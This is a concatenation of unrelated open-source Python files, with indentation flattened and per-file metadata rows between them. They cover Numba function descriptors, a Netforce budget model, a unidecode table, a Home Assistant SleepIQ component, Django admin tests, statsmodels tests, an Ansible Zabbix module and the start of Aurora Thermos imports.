if isinstance(arg, types.Record):
return "Record_%s" % arg._code
elif (isinstance(arg, types.Array) and
isinstance(arg.dtype, types.Record)):
type_name = "array" if arg.mutable else "readonly array"
return ("%s(Record_%s, %sd, %s)"
% (type_name, arg.dtype._code, arg.ndim, arg.layout))
else:
return str(arg)
def default_mangler(name, argtypes):
codedargs = '.'.join(transform_arg_name(a).replace(' ', '_')
for a in argtypes)
return '.'.join([name, codedargs])
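# Illustrative example (added comment, not part of the original source): for a
# function named "add" specialized on (int64, float64), default_mangler returns
# 'add.int64.float64' -- the stringified argument types are joined with '.' and
# any spaces inside a type string are replaced by '_'.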
# A dummy module for dynamically-generated functions
_dynamic_modname = '<dynamic>'
_dynamic_module = ModuleType(_dynamic_modname)
_dynamic_module.__builtins__ = six.moves.builtins
class FunctionDescriptor(object):
"""
Base class for function descriptors: an object used to carry
useful metadata about a natively callable function.
"""
__slots__ = ('native', 'modname', 'qualname', 'doc', 'typemap',
'calltypes', 'args', 'kws', 'restype', 'argtypes',
'mangled_name', 'unique_name', 'inline')
_unique_ids = itertools.count(1)
def __init__(self, native, modname, qualname, unique_name, doc,
typemap, restype, calltypes, args, kws, mangler=None,
argtypes=None, inline=False):
self.native = native
self.modname = modname
self.qualname = qualname
self.unique_name = unique_name
self.doc = doc
self.typemap = typemap
self.calltypes = calltypes
self.args = args
self.kws = kws
self.restype = restype
# Argument types
if argtypes is not None:
self.argtypes = argtypes
else:
# Get argument types from the type inference result
# (note the "arg.FOO" convention as used in typeinfer
self.argtypes = [self.typemap['arg.' + a] for a in args]
mangler = default_mangler if mangler is None else mangler
# The mangled name *must* be unique, else the wrong function can
# be chosen at link time.
if self.modname:
self.mangled_name = mangler('%s.%s' % (self.modname, self.unique_name),
self.argtypes)
else:
self.mangled_name = mangler(self.unique_name, self.argtypes)
self.inline = inline
def lookup_module(self):
"""
Return the module in which this function is supposed to exist.
This may be a dummy module if the function was dynamically
generated.
"""
if self.modname == _dynamic_modname:
return _dynamic_module
else:
return sys.modules[self.modname]
def lookup_function(self):
"""
Return the original function object described by this object.
"""
return getattr(self.lookup_module(), self.qualname)
@property
def llvm_func_name(self):
"""
The LLVM-registered name for the raw function.
"""
return self.mangled_name
@property
def llvm_cpython_wrapper_name(self):
"""
The LLVM-registered name for a CPython-compatible wrapper of the
raw function (i.e. a PyCFunctionWithKeywords).
"""
return 'wrapper.' + self.mangled_name
def __repr__(self):
return "<function descriptor %r>" % (self.unique_name)
@classmethod
def _get_function_info(cls, interp):
"""
Returns
-------
qualname, unique_name, modname, doc, args, kws, globals
``unique_name`` must be a unique name.
"""
func = interp.bytecode.func
qualname = interp.bytecode.func_qualname
modname = func.__module__
doc = func.__doc__ or ''
args = tuple(interp.arg_names)
kws = () # TODO
if modname is None:
# Dynamically generated function.
modname = _dynamic_modname
# Even the same function definition can be compiled into
# several different function objects with distinct closure
        # variables, so we make sure to disambiguate using a unique id.
unique_name = "%s$%d" % (qualname, next(cls._unique_ids))
return qualname, unique_name, modname, doc, args, kws
@classmethod
def _from_python_function(cls, interp, typemap, restype, calltypes,
native, mangler=None, inline=False):
(qualname, unique_name, modname, doc, args, kws,
         ) = cls._get_function_info(interp)
self = cls(native, modname, qualname, unique_name, doc,
typemap, restype, calltypes,
args, kws, mangler=mangler, inline=inline)
return self
class PythonFunctionDescriptor(FunctionDescriptor):
"""
A FunctionDescriptor subclass for Numba-compiled functions.
"""
__slots__ = ()
@classmethod
def from_specialized_function(cls, interp, typemap, restype, calltypes,
mangler, inline):
"""
Build a FunctionDescriptor for a given specialization of a Python
function (in nopython mode).
"""
return cls._from_python_function(interp, typemap, restype, calltypes,
native=True, mangler=mangler,
inline=inline)
@classmethod
def from_object_mode_function(cls, interp):
"""
Build a FunctionDescriptor for an object mode variant of a Python
function.
"""
typemap = defaultdict(lambda: types.pyobject)
calltypes = typemap.copy()
restype = types.pyobject
return cls._from_python_function(interp, typemap, restype, calltypes,
native=False)
class ExternalFunctionDescriptor(FunctionDescriptor):
"""
A FunctionDescriptor subclass for opaque external functions
(e.g. raw C functions).
"""
__slots__ = ()
def __init__(self, name, restype, argtypes):
args = ["arg%d" % i for i in range(len(argtypes))]
super(ExternalFunctionDescriptor, self).__init__(native=True,
modname=None, qualname=name, unique_name=name, doc='',
typemap=None, restype=restype, calltypes=None,
args=args, kws=None, mangler=lambda a, x: a,
argtypes=argtypes)
| bsd-2-clause | 5,825,912,725,351,149,000 | 33.374359 | 83 | 0.588841 | false |
sidzan/netforce | netforce_account/netforce_account/models/account_budget.py | 4 | 1571 | # Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from netforce.model import Model, fields
class Budget(Model):
_name = "account.budget"
_string = "Budget"
_key = ["name"]
_fields = {
"name": fields.Char("Name", required=True, search=True),
"date_from": fields.Date("From Date"),
"date_to": fields.Date("To Date", required=True, search=True),
"lines": fields.One2Many("account.budget.line", "budget_id", "Budget Items"),
}
_order = "name"
Budget.register()
| mit | 6,020,272,555,940,924,000 | 42.638889 | 85 | 0.723743 | false |
ukanga/SickRage | lib/unidecode/x084.py | 252 | 4646 | data = (
'Hu ', # 0x00
'Qi ', # 0x01
'He ', # 0x02
'Cui ', # 0x03
'Tao ', # 0x04
'Chun ', # 0x05
'Bei ', # 0x06
'Chang ', # 0x07
'Huan ', # 0x08
'Fei ', # 0x09
'Lai ', # 0x0a
'Qi ', # 0x0b
'Meng ', # 0x0c
'Ping ', # 0x0d
'Wei ', # 0x0e
'Dan ', # 0x0f
'Sha ', # 0x10
'Huan ', # 0x11
'Yan ', # 0x12
'Yi ', # 0x13
'Tiao ', # 0x14
'Qi ', # 0x15
'Wan ', # 0x16
'Ce ', # 0x17
'Nai ', # 0x18
'Kutabireru ', # 0x19
'Tuo ', # 0x1a
'Jiu ', # 0x1b
'Tie ', # 0x1c
'Luo ', # 0x1d
'[?] ', # 0x1e
'[?] ', # 0x1f
'Meng ', # 0x20
'[?] ', # 0x21
'Yaji ', # 0x22
'[?] ', # 0x23
'Ying ', # 0x24
'Ying ', # 0x25
'Ying ', # 0x26
'Xiao ', # 0x27
'Sa ', # 0x28
'Qiu ', # 0x29
'Ke ', # 0x2a
'Xiang ', # 0x2b
'Wan ', # 0x2c
'Yu ', # 0x2d
'Yu ', # 0x2e
'Fu ', # 0x2f
'Lian ', # 0x30
'Xuan ', # 0x31
'Yuan ', # 0x32
'Nan ', # 0x33
'Ze ', # 0x34
'Wo ', # 0x35
'Chun ', # 0x36
'Xiao ', # 0x37
'Yu ', # 0x38
'Pian ', # 0x39
'Mao ', # 0x3a
'An ', # 0x3b
'E ', # 0x3c
'Luo ', # 0x3d
'Ying ', # 0x3e
'Huo ', # 0x3f
'Gua ', # 0x40
'Jiang ', # 0x41
'Mian ', # 0x42
'Zuo ', # 0x43
'Zuo ', # 0x44
'Ju ', # 0x45
'Bao ', # 0x46
'Rou ', # 0x47
'Xi ', # 0x48
'Xie ', # 0x49
'An ', # 0x4a
'Qu ', # 0x4b
'Jian ', # 0x4c
'Fu ', # 0x4d
'Lu ', # 0x4e
'Jing ', # 0x4f
'Pen ', # 0x50
'Feng ', # 0x51
'Hong ', # 0x52
'Hong ', # 0x53
'Hou ', # 0x54
'Yan ', # 0x55
'Tu ', # 0x56
'Zhu ', # 0x57
'Zi ', # 0x58
'Xiang ', # 0x59
'Shen ', # 0x5a
'Ge ', # 0x5b
'Jie ', # 0x5c
'Jing ', # 0x5d
'Mi ', # 0x5e
'Huang ', # 0x5f
'Shen ', # 0x60
'Pu ', # 0x61
'Gai ', # 0x62
'Dong ', # 0x63
'Zhou ', # 0x64
'Qian ', # 0x65
'Wei ', # 0x66
'Bo ', # 0x67
'Wei ', # 0x68
'Pa ', # 0x69
'Ji ', # 0x6a
'Hu ', # 0x6b
'Zang ', # 0x6c
'Jia ', # 0x6d
'Duan ', # 0x6e
'Yao ', # 0x6f
'Jun ', # 0x70
'Cong ', # 0x71
'Quan ', # 0x72
'Wei ', # 0x73
'Xian ', # 0x74
'Kui ', # 0x75
'Ting ', # 0x76
'Hun ', # 0x77
'Xi ', # 0x78
'Shi ', # 0x79
'Qi ', # 0x7a
'Lan ', # 0x7b
'Zong ', # 0x7c
'Yao ', # 0x7d
'Yuan ', # 0x7e
'Mei ', # 0x7f
'Yun ', # 0x80
'Shu ', # 0x81
'Di ', # 0x82
'Zhuan ', # 0x83
'Guan ', # 0x84
'Sukumo ', # 0x85
'Xue ', # 0x86
'Chan ', # 0x87
'Kai ', # 0x88
'Kui ', # 0x89
'[?] ', # 0x8a
'Jiang ', # 0x8b
'Lou ', # 0x8c
'Wei ', # 0x8d
'Pai ', # 0x8e
'[?] ', # 0x8f
'Sou ', # 0x90
'Yin ', # 0x91
'Shi ', # 0x92
'Chun ', # 0x93
'Shi ', # 0x94
'Yun ', # 0x95
'Zhen ', # 0x96
'Lang ', # 0x97
'Nu ', # 0x98
'Meng ', # 0x99
'He ', # 0x9a
'Que ', # 0x9b
'Suan ', # 0x9c
'Yuan ', # 0x9d
'Li ', # 0x9e
'Ju ', # 0x9f
'Xi ', # 0xa0
'Pang ', # 0xa1
'Chu ', # 0xa2
'Xu ', # 0xa3
'Tu ', # 0xa4
'Liu ', # 0xa5
'Wo ', # 0xa6
'Zhen ', # 0xa7
'Qian ', # 0xa8
'Zu ', # 0xa9
'Po ', # 0xaa
'Cuo ', # 0xab
'Yuan ', # 0xac
'Chu ', # 0xad
'Yu ', # 0xae
'Kuai ', # 0xaf
'Pan ', # 0xb0
'Pu ', # 0xb1
'Pu ', # 0xb2
'Na ', # 0xb3
'Shuo ', # 0xb4
'Xi ', # 0xb5
'Fen ', # 0xb6
'Yun ', # 0xb7
'Zheng ', # 0xb8
'Jian ', # 0xb9
'Ji ', # 0xba
'Ruo ', # 0xbb
'Cang ', # 0xbc
'En ', # 0xbd
'Mi ', # 0xbe
'Hao ', # 0xbf
'Sun ', # 0xc0
'Zhen ', # 0xc1
'Ming ', # 0xc2
'Sou ', # 0xc3
'Xu ', # 0xc4
'Liu ', # 0xc5
'Xi ', # 0xc6
'Gu ', # 0xc7
'Lang ', # 0xc8
'Rong ', # 0xc9
'Weng ', # 0xca
'Gai ', # 0xcb
'Cuo ', # 0xcc
'Shi ', # 0xcd
'Tang ', # 0xce
'Luo ', # 0xcf
'Ru ', # 0xd0
'Suo ', # 0xd1
'Xian ', # 0xd2
'Bei ', # 0xd3
'Yao ', # 0xd4
'Gui ', # 0xd5
'Bi ', # 0xd6
'Zong ', # 0xd7
'Gun ', # 0xd8
'Za ', # 0xd9
'Xiu ', # 0xda
'Ce ', # 0xdb
'Hai ', # 0xdc
'Lan ', # 0xdd
'[?] ', # 0xde
'Ji ', # 0xdf
'Li ', # 0xe0
'Can ', # 0xe1
'Lang ', # 0xe2
'Yu ', # 0xe3
'[?] ', # 0xe4
'Ying ', # 0xe5
'Mo ', # 0xe6
'Diao ', # 0xe7
'Tiao ', # 0xe8
'Mao ', # 0xe9
'Tong ', # 0xea
'Zhu ', # 0xeb
'Peng ', # 0xec
'An ', # 0xed
'Lian ', # 0xee
'Cong ', # 0xef
'Xi ', # 0xf0
'Ping ', # 0xf1
'Qiu ', # 0xf2
'Jin ', # 0xf3
'Chun ', # 0xf4
'Jie ', # 0xf5
'Wei ', # 0xf6
'Tui ', # 0xf7
'Cao ', # 0xf8
'Yu ', # 0xf9
'Yi ', # 0xfa
'Ji ', # 0xfb
'Liao ', # 0xfc
'Bi ', # 0xfd
'Lu ', # 0xfe
'Su ', # 0xff
)
| gpl-3.0 | -7,254,953,113,444,465,000 | 17.007752 | 24 | 0.387215 | false |
florianholzapfel/home-assistant | homeassistant/components/sleepiq.py | 15 | 3418 | """
Support for SleepIQ from SleepNumber.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sleepiq/
"""
import logging
from datetime import timedelta
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import discovery
from homeassistant.helpers.entity import Entity
from homeassistant.const import CONF_USERNAME, CONF_PASSWORD
from homeassistant.util import Throttle
from requests.exceptions import HTTPError
DOMAIN = 'sleepiq'
REQUIREMENTS = ['sleepyq==0.6']
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=30)
IS_IN_BED = 'is_in_bed'
SLEEP_NUMBER = 'sleep_number'
SENSOR_TYPES = {
SLEEP_NUMBER: 'SleepNumber',
IS_IN_BED: 'Is In Bed',
}
LEFT = 'left'
RIGHT = 'right'
SIDES = [LEFT, RIGHT]
_LOGGER = logging.getLogger(__name__)
DATA = None
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
}),
}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
"""Setup SleepIQ.
Will automatically load sensor components to support
devices discovered on the account.
"""
# pylint: disable=global-statement
global DATA
from sleepyq import Sleepyq
username = config[DOMAIN][CONF_USERNAME]
password = config[DOMAIN][CONF_PASSWORD]
client = Sleepyq(username, password)
try:
DATA = SleepIQData(client)
DATA.update()
except HTTPError:
message = """
SleepIQ failed to login, double check your username and password"
"""
_LOGGER.error(message)
return False
discovery.load_platform(hass, 'sensor', DOMAIN, {}, config)
discovery.load_platform(hass, 'binary_sensor', DOMAIN, {}, config)
return True
class SleepIQData(object):
"""Gets the latest data from SleepIQ."""
def __init__(self, client):
"""Initialize the data object."""
self._client = client
self.beds = {}
self.update()
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Get the latest data from SleepIQ."""
self._client.login()
beds = self._client.beds_with_sleeper_status()
self.beds = {bed.bed_id: bed for bed in beds}
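# Illustrative use of the data object (added comment, not part of the original
# component): update() is rate limited by @Throttle, so calls made within
# MIN_TIME_BETWEEN_UPDATES of each other return early and the sensors keep
# reading the cached `beds` mapping.
#
#   data = SleepIQData(client)
#   data.update()
#   for bed_id, bed in data.beds.items():
#       print(bed.name, bed.left.sleeper.first_name)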
class SleepIQSensor(Entity):
"""Implementation of a SleepIQ sensor."""
def __init__(self, sleepiq_data, bed_id, side):
"""Initialize the sensor."""
self._bed_id = bed_id
self._side = side
self.sleepiq_data = sleepiq_data
self.side = None
self.bed = None
# added by subclass
self._name = None
self.type = None
@property
def name(self):
"""Return the name of the sensor."""
return 'SleepNumber {} {} {}'.format(self.bed.name,
self.side.sleeper.first_name,
self._name)
def update(self):
"""Get the latest data from SleepIQ and updates the states."""
# Call the API for new sleepiq data. Each sensor will re-trigger this
# same exact call, but thats fine. We cache results for a short period
# of time to prevent hitting API limits.
self.sleepiq_data.update()
self.bed = self.sleepiq_data.beds[self._bed_id]
self.side = getattr(self.bed, self._side)
| mit | 2,832,404,081,076,921,300 | 25.913386 | 78 | 0.633996 | false |
keedio/hue | desktop/core/ext-py/Django-1.6.10/tests/admin_changelist/admin.py | 52 | 3133 | from __future__ import absolute_import
from django.contrib import admin
from django.core.paginator import Paginator
from .models import (Event, Child, Parent, Genre, Band, Musician, Group,
Quartet, Membership, ChordsMusician, ChordsBand, Invitation, Swallow)
site = admin.AdminSite(name="admin")
class CustomPaginator(Paginator):
def __init__(self, queryset, page_size, orphans=0, allow_empty_first_page=True):
super(CustomPaginator, self).__init__(queryset, 5, orphans=2,
allow_empty_first_page=allow_empty_first_page)
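# Note (added for clarity, not part of the original test app): this paginator
# deliberately ignores the page_size passed in by the changelist and always
# paginates by 5 objects with 2 orphans, which is what CustomPaginationAdmin
# below exercises.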
class EventAdmin(admin.ModelAdmin):
list_display = ['event_date_func']
def event_date_func(self, event):
return event.date
site.register(Event, EventAdmin)
class ParentAdmin(admin.ModelAdmin):
list_filter = ['child__name']
search_fields = ['child__name']
class ChildAdmin(admin.ModelAdmin):
list_display = ['name', 'parent']
list_per_page = 10
list_filter = ['parent', 'age']
def get_queryset(self, request):
return super(ChildAdmin, self).get_queryset(request).select_related("parent__name")
class CustomPaginationAdmin(ChildAdmin):
paginator = CustomPaginator
class FilteredChildAdmin(admin.ModelAdmin):
list_display = ['name', 'parent']
list_per_page = 10
def get_queryset(self, request):
return super(FilteredChildAdmin, self).get_queryset(request).filter(
name__contains='filtered')
class BandAdmin(admin.ModelAdmin):
list_filter = ['genres']
class GroupAdmin(admin.ModelAdmin):
list_filter = ['members']
class QuartetAdmin(admin.ModelAdmin):
list_filter = ['members']
class ChordsBandAdmin(admin.ModelAdmin):
list_filter = ['members']
class InvitationAdmin(admin.ModelAdmin):
list_display = ('band', 'player')
list_select_related = ('player',)
class DynamicListDisplayChildAdmin(admin.ModelAdmin):
list_display = ('parent', 'name', 'age')
def get_list_display(self, request):
my_list_display = super(DynamicListDisplayChildAdmin, self).get_list_display(request)
if request.user.username == 'noparents':
my_list_display = list(my_list_display)
my_list_display.remove('parent')
return my_list_display
class DynamicListDisplayLinksChildAdmin(admin.ModelAdmin):
list_display = ('parent', 'name', 'age')
list_display_links = ['parent', 'name']
def get_list_display_links(self, request, list_display):
return ['age']
site.register(Child, DynamicListDisplayChildAdmin)
class SwallowAdmin(admin.ModelAdmin):
actions = None # prevent ['action_checkbox'] + list(list_display)
list_display = ('origin', 'load', 'speed')
site.register(Swallow, SwallowAdmin)
class DynamicListFilterChildAdmin(admin.ModelAdmin):
list_filter = ('parent', 'name', 'age')
def get_list_filter(self, request):
my_list_filter = super(DynamicListFilterChildAdmin, self).get_list_filter(request)
if request.user.username == 'noparents':
my_list_filter = list(my_list_filter)
my_list_filter.remove('parent')
return my_list_filter
| apache-2.0 | -7,460,381,594,641,713,000 | 27.743119 | 93 | 0.68752 | false |
nguyentu1602/statsmodels | statsmodels/stats/tests/test_groups_sw.py | 34 | 2750 | # -*- coding: utf-8 -*-
"""Test for a helper function for PanelHAC robust covariance
these functions should be rewritten to make them more efficient
Created on Thu May 17 21:09:41 2012
Author: Josef Perktold
"""
import numpy as np
from numpy.testing import assert_equal, assert_raises
import statsmodels.stats.sandwich_covariance as sw
from statsmodels.tools.grouputils import Group, GroupSorted
class CheckPanelLagMixin(object):
def calculate(self):
self.g = g = GroupSorted(self.gind) # pylint: disable-msg=W0201
self.alla = [(lag, sw.lagged_groups(self.x, lag, g.groupidx)) # pylint: disable-msg=W0201
for lag in range(5)]
def test_values(self):
for lag, (y0, ylag) in self.alla:
assert_equal(y0, self.alle[lag].T)
assert_equal(y0, ylag + lag)
def test_raises(self):
mlag = self.mlag
assert_raises(ValueError, sw.lagged_groups, self.x, mlag,
self.g.groupidx)
class TestBalanced(CheckPanelLagMixin):
def __init__(self):
self.gind = np.repeat([0,1,2], 5)
self.mlag = 5
x = np.arange(15)
x += 10**self.gind
self.x = x[:,None]
#expected result
self.alle = {
0 : np.array([[ 1, 2, 3, 4, 5, 15, 16, 17, 18, 19,
110, 111, 112, 113, 114]]),
1 : np.array([[ 2, 3, 4, 5, 16, 17, 18, 19, 111, 112,
113, 114]]),
2 : np.array([[ 3, 4, 5, 17, 18, 19, 112, 113, 114]]),
3 : np.array([[ 4, 5, 18, 19, 113, 114]]),
4 : np.array([[ 5, 19, 114]])
}
self.calculate()
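# Reading the fixture above (comment added for clarity, not in the original
# test): with gind = [0]*5 + [1]*5 + [2]*5 and x[i] = i + 10**group, lag=k
# drops the first k observations of every group, so alle[k] holds the
# remaining values and test_values checks y0 == ylag + k (true here only
# because x increases by exactly 1 within each group).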
class TestUnBalanced(CheckPanelLagMixin):
def __init__(self):
self.gind = gind = np.repeat([0,1,2], [3, 5, 10])
self.mlag = 10 #maxlag
x = np.arange(18)
x += 10**gind
self.x = x[:,None]
#expected result
self.alle = {
0 : np.array([[ 1, 2, 3, 13, 14, 15, 16, 17, 108, 109,
110, 111, 112, 113, 114, 115, 116, 117]]),
1 : np.array([[ 2, 3, 14, 15, 16, 17, 109, 110, 111, 112,
113, 114, 115, 116, 117]]),
2 : np.array([[ 3, 15, 16, 17, 110, 111, 112, 113, 114, 115,
116, 117]]),
3 : np.array([[ 16, 17, 111, 112, 113, 114, 115, 116, 117]]),
4 : np.array([[ 17, 112, 113, 114, 115, 116, 117]]),
5 : np.array([[113, 114, 115, 116, 117]]),
}
self.calculate()
if __name__ == '__main__':
import nose
nose.runmodule(argv=[__file__, '-vvs', '-x', '--pdb-failures'], exit=False)
| bsd-3-clause | -2,665,996,803,205,696,000 | 34.25641 | 98 | 0.494545 | false |
markusappel/McCode | tools/Python/www/www-django/mcwww/mcwww/wsgi.py | 3 | 1132 | """
WSGI config for mcwww project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mcwww.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| gpl-2.0 | -8,129,405,261,898,038,000 | 39.428571 | 79 | 0.79947 | false |
drewandersonnz/openshift-tools | ansible/roles/lib_zabbix/library/zbx_graphprototype.py | 16 | 10207 | #!/usr/bin/env python
'''
Ansible module for zabbix graphprototypes
'''
# vim: expandtab:tabstop=4:shiftwidth=4
#
# Zabbix graphprototypes ansible module
#
#
# Copyright 2015 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#---
#- hosts: localhost
# gather_facts: no
# tasks:
# - zbx_graphprototype:
# zbx_server: https://zabbixserver/zabbix/api_jsonrpc.php
# zbx_user: Admin
# zbx_password: zabbix
# name: Test Graph
# height: 300
# width: 500
# graph_items:
# - item_name: Bytes per second IN on network interface {#OSO_NET_INTERFACE}
# color: red
# line_style: bold
# item_type: prototype
# - item_name: Template OS Linux: Bytes per second OUT on network interface {#OSO_NET_INTERFACE}
# item_type: prototype
#
#
# This is in place because each module looks similar to each other.
# These need duplicate code as their behavior is very similar
# but different for each zabbix class.
# pylint: disable=duplicate-code
# pylint: disable=import-error
from openshift_tools.zbxapi import ZabbixAPI, ZabbixConnection
def exists(content, key='result'):
''' Check if key exists in content or the size of content[key] > 0
'''
if not content.has_key(key):
return False
if not content[key]:
return False
return True
def get_graph_type(graphtype):
'''
Possible values:
0 - normal;
1 - stacked;
2 - pie;
3 - exploded;
'''
gtype = 0
if 'stacked' in graphtype:
gtype = 1
elif 'pie' in graphtype:
gtype = 2
elif 'exploded' in graphtype:
gtype = 3
return gtype
def get_show_legend(show_legend):
'''Get the value for show_legend
0 - hide
1 - (default) show
'''
rval = 1
if 'hide' == show_legend:
rval = 0
return rval
def get_template_id(zapi, template_name):
'''
get related templates
'''
# Fetch templates by name
content = zapi.get_content('template',
'get',
{'filter': {'host': template_name},})
if content.has_key('result'):
return content['result'][0]['templateid']
return None
def get_color(color_in='black'):
''' Receive a color and translate it to a hex representation of the color
Will have a few setup by default
'''
colors = {'black': '000000',
'red': 'FF0000',
'pink': 'FFC0CB',
'purple': '800080',
'orange': 'FFA500',
'gold': 'FFD700',
'yellow': 'FFFF00',
'green': '008000',
'cyan': '00FFFF',
'aqua': '00FFFF',
'blue': '0000FF',
'brown': 'A52A2A',
'gray': '808080',
'grey': '808080',
'silver': 'C0C0C0',
}
if colors.has_key(color_in):
return colors[color_in]
return color_in
def get_line_style(style):
'''determine the line style
'''
line_style = {'line': 0,
'filled': 1,
'bold': 2,
'dot': 3,
'dashed': 4,
'gradient': 5,
}
if line_style.has_key(style):
return line_style[style]
return 0
def get_calc_function(func):
'''Determine the caclulation function'''
rval = 2 # default to avg
if 'min' in func:
rval = 1
elif 'max' in func:
rval = 4
elif 'all' in func:
rval = 7
elif 'last' in func:
rval = 9
return rval
def get_graph_item_type(gtype):
'''Determine the graph item type
'''
rval = 0 # simple graph type
if 'sum' in gtype:
rval = 2
return rval
def get_graph_items(zapi, gitems):
'''Get graph items by id'''
r_items = []
for item in gitems:
content = zapi.get_content('item%s' % item.get('item_type', ''),
'get',
{'filter': {'name': item['item_name']}})
_ = item.pop('item_name')
color = get_color(item.pop('color', 'black'))
drawtype = get_line_style(item.get('line_style', 'line'))
func = get_calc_function(item.get('calc_func', 'avg'))
g_type = get_graph_item_type(item.get('graph_item_type', 'simple'))
if content.has_key('result'):
tmp = {'itemid': content['result'][0]['itemid'],
'color': color,
'drawtype': drawtype,
'calc_fnc': func,
'type': g_type,
}
r_items.append(tmp)
return r_items
def compare_gitems(zabbix_items, user_items):
'''Compare zabbix results with the user's supplied items
return True if user_items are equal
return False if any of the values differ
'''
if len(zabbix_items) != len(user_items):
return False
for u_item in user_items:
for z_item in zabbix_items:
if u_item['itemid'] == z_item['itemid']:
if not all([str(value) == z_item[key] for key, value in u_item.items()]):
return False
return True
# The branches are needed for CRUD and error handling
# pylint: disable=too-many-branches
def main():
'''
ansible zabbix module for zbx_graphprototypes
'''
module = AnsibleModule(
argument_spec=dict(
zbx_server=dict(default='https://localhost/zabbix/api_jsonrpc.php', type='str'),
zbx_user=dict(default=os.environ.get('ZABBIX_USER', None), type='str'),
zbx_password=dict(default=os.environ.get('ZABBIX_PASSWORD', None), type='str'),
zbx_debug=dict(default=False, type='bool'),
name=dict(default=None, type='str'),
height=dict(default=None, type='int'),
width=dict(default=None, type='int'),
graph_type=dict(default='normal', type='str'),
show_legend=dict(default='show', type='str'),
state=dict(default='present', type='str'),
graph_items=dict(default=None, type='list'),
),
#supports_check_mode=True
)
zapi = ZabbixAPI(ZabbixConnection(module.params['zbx_server'],
module.params['zbx_user'],
module.params['zbx_password'],
module.params['zbx_debug']))
#Set the instance and the template for the rest of the calls
zbx_class_name = 'graphprototype'
state = module.params['state']
content = zapi.get_content(zbx_class_name,
'get',
{'filter': {'name': module.params['name']},
#'templateids': templateid,
'selectGraphItems': 'extend',
})
#******#
# GET
#******#
if state == 'list':
module.exit_json(changed=False, results=content['result'], state="list")
#******#
# DELETE
#******#
if state == 'absent':
if not exists(content):
module.exit_json(changed=False, state="absent")
content = zapi.get_content(zbx_class_name, 'delete', [content['result'][0]['graphid']])
module.exit_json(changed=True, results=content['result'], state="absent")
# Create and Update
if state == 'present':
params = {'name': module.params['name'],
'height': module.params['height'],
'width': module.params['width'],
'graphtype': get_graph_type(module.params['graph_type']),
'show_legend': get_show_legend(module.params['show_legend']),
'gitems': get_graph_items(zapi, module.params['graph_items']),
}
# Remove any None valued params
_ = [params.pop(key, None) for key in params.keys() if params[key] is None]
#******#
# CREATE
#******#
if not exists(content):
content = zapi.get_content(zbx_class_name, 'create', params)
if content.has_key('error'):
module.exit_json(failed=True, changed=True, results=content['error'], state="present")
module.exit_json(changed=True, results=content['result'], state='present')
########
# UPDATE
########
differences = {}
zab_results = content['result'][0]
for key, value in params.items():
if key == 'gitems':
if not compare_gitems(zab_results[key], value):
differences[key] = value
elif zab_results[key] != value and zab_results[key] != str(value):
differences[key] = value
if not differences:
module.exit_json(changed=False, results=zab_results, state="present")
# We have differences and need to update
differences['graphid'] = zab_results['graphid']
content = zapi.get_content(zbx_class_name, 'update', differences)
if content.has_key('error'):
module.exit_json(failed=True, changed=False, results=content['error'], state="present")
module.exit_json(changed=True, results=content['result'], state="present")
module.exit_json(failed=True,
changed=False,
results='Unknown state passed. %s' % state,
state="unknown")
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import, locally-disabled
# import module snippets. This are required
from ansible.module_utils.basic import *
main()
| apache-2.0 | -5,983,438,661,443,240,000 | 29.836858 | 102 | 0.549721 | false |
protochron/aurora | src/main/python/apache/thermos/core/helper.py | 7 | 14943 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import errno
import os
import signal
import time
from contextlib import closing
import psutil
from twitter.common import log
from twitter.common.dirutil import lock_file, safe_mkdir
from twitter.common.quantity import Amount, Time
from twitter.common.recordio import ThriftRecordWriter
from apache.thermos.common.ckpt import CheckpointDispatcher
